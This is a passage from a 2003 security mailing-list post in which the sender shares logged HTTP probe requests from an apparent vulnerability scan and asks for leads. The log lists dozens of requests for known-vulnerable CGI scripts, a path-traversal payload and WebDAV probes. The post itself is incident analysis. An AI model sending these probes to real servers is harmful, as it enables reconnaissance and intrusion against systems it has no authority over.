/ROADS/cgi-bin/search.pl HTTP/1.0\x0a\x0a HEAD /inc/sendmail.inc HTTP/1.0\x0a\x0a HEAD /setpasswd.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/simplestguest.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/simplestmail.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0\x0a\x0a HEAD /html/snort2html.html HTTP/1.0\x0a\x0a HEAD /snort2html.html HTTP/1.0\x0a\x0a HEAD /site/eg/source.asp HTTP/1.0\x0a\x0a HEAD /secret/secret/sql_tool.shtml HTTP/1.0\x0a\x0a HEAD /cd-cgi/sscd_suncourier.pl HTTP/1.0\x0a\x0a HEAD /stat.htm HTTP/1.0\x0a\x0a HEAD /stats.htm HTTP/1.0\x0a\x0a HEAD /stats.html HTTP/1.0\x0a\x0a HEAD /stats.txt HTTP/1.0\x0a\x0a HEAD /scripts/submit.cgi HTTP/1.0\x0a\x0a HEAD /users/scripts/submit.cgi HTTP/1.0\x0a\x0a HEAD /submit.php?CONF=anything HTTP/1.0\x0a\x0a HEAD /cgi-bin/subscribe.pl HTTP/1.0\x0a\x0a HEAD /subscribe.pl?testat_private HTTP/1.0\x0a\x0a HEAD /survey HTTP/1.0\x0a\x0a HEAD /cgi-bin/survey.cgi HTTP/1.0\x0a\x0a HEAD /technote/main.cgi/oops? board=FREE_BOARD&command=down_load&filename=/../../../main.cgi HTTP/1.0 \x0a\x0a HEAD /technote/print.cgi HTTP/1.0\x0a\x0a HEAD /test/test.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/test-cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/textcounter.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/search/tidfinder.cgi?2956734 HTTP/1.0\x0a\x0a HEAD /cgi-bin/ultraboard.cgi HTTP/1.0\x0a\x0a HEAD /ultraboard.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/unlg1.1 HTTP/1.0\x0a\x0a HEAD /cgi-bin/unlg1.2 HTTP/1.0\x0a\x0a HEAD /cgi-bin/upload_file.pl HTTP/1.0\x0a\x0a HEAD /user.php&op=saveuser HTTP/1.0\x0a\x0a HEAD /cgi-auth/userreg.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/ustorekeeper.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/view_page.html HTTP/1.0\x0a\x0a HEAD /cgi-bin/view-source HTTP/1.0\x0a\x0a HEAD /search97cgi/vtopic HTTP/1.0\x0a\x0a HEAD /cgi-bin/w3-msql HTTP/1.0\x0a\x0a HEAD /cgi-bin/wais.pl HTTP/1.0\x0a\x0a HEAD /way-board/way-board.cgi HTTP/1.0\x0a\x0a HEAD /webaccess.htm HTTP/1.0\x0a\x0a HEAD /cgi-bin/webdata.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/webdist.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/webdriver HTTP/1.0\x0a\x0a HEAD /cgi-bin/webgais HTTP/1.0\x0a\x0a HEAD //WEB-INF/ HTTP/1.0\x0a\x0a HEAD /cgi-bin/replicator/webpage.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml HTTP/1.0 \x0a\x0a HEAD /cgi-bin/websendmail HTTP/1.0\x0a\x0a HEAD /cgi-bin/webspirs.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/webwho.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/scripts/whois.cgi?action=load&whois=check HTTP/1.0\x0a\x0a HEAD /cgi-bin/whois_raw.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/wrap.cgi HTTP/1.0\x0a\x0a HEAD /WSFTP.LOG HTTP/1.0\x0a\x0a HEAD /cgi-bin/wwwboard.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/www-sql HTTP/1.0\x0a\x0a OPTIONS / HTTP/1.1\x0d\x0atranslate: f\x0d\x0aUser-Agent: Microsoft- WebDAV-MiniRedir/5.1.2600\x0d\x0aHost: 159.37.8.1\x0d\x0aContent-Length: 0 \x0d\x0aConnection: Keep-Alive\x0d\x0a\x0d\x0a SEARCH / HTTP/1.0\x0d\x0a\x0d\x0a Thanks for any leads, Dean ---------------------------------------------------------------------------- Powerful Anti-Spam Management and More... SurfControl E-mail Filter puts the brakes on spam, viruses and malicious code. Safeguard your business critical communications. Download a free 30-day trial: http://www.securityfocus.com/SurfControl-incidents <b> ---------------------------------------------------------------------------- Is SPAM over-loading your e-mail server, disk space or bandwidth? SurfControl E-Mail Filter is flexible, intelligent and policy-driven protection. http://www.securityfocus.com/SurfControl-incidents2 Download your free fully functional trial, complete with 30-days of free technical support. Stop SPAM before it stops you. ---------------------------------------------------------------------------- </b>
This archive was generated by hypermail 2b30 : Mon Apr 07 2003 - 15:40:31 PDT